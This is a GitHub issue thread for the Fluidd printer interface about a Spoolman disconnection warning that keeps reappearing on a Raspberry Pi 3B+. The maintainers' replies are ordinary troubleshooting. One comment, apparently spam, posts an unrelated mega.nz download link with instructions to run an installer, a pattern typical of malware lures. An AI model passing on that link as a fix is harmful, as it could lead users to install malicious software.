fluidd-core/fluidd #1486: Spoolman server disconnected error message

thijstriemstra, 2024-08-25:
### Fluidd Version

3.10.3

### Browser

Firefox

### Device

Desktop PC

### Operating System

Windows

### What happened

I’m closing the “spoolman server closed” red warning message several times a day, it constantly pops up, even though the connection is ready (or few seconds later)

### What did you expect to happen

(ability to) hide the message completely, or only show in spoolman panel. Restarting also doesn’t renove the notification, basically showing outdated info as long as it’s not closed manually. It seems like it started happening alot since upgrading to fluidd 3.10.3 and spoolman 0.19.3

### How to reproduce

start fluidd/printer: message pops up
restart fluidd printer: message pops up

### Additional information

i’m running it on a rpi3b+ which isn’t the fastest, maybe this is what’s causing it

AlecsSantos, 2024-08-25:
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

matmen, 2024-08-25:
Thanks for your report. I think the error is reported by moonraker directly, in response to the API call to fetch the available spools. This would indicate that moonraker isn't able to communicate with spoolman directly. I think we could add a feature to silence the notifications or just show the error in the spoolman card. Either way, can you share your moonraker log file so I see if I can reproduce the issue?

thijstriemstra, 2024-08-26:
i'm on holiday but will get back to you in few weeks, thanks for the feedback

thijstriemstra, 2024-10-22:
Since switching from rpi 3b+ to rpi 4 I haven't seen this message again so this only seems to be happening on slow hardware..

matmen, 2024-10-22:
Thanks for the feedback. I'll close this issue for now, but feel free to re-open it if the issue re-occurs :)

closed 2024-10-22 by matmen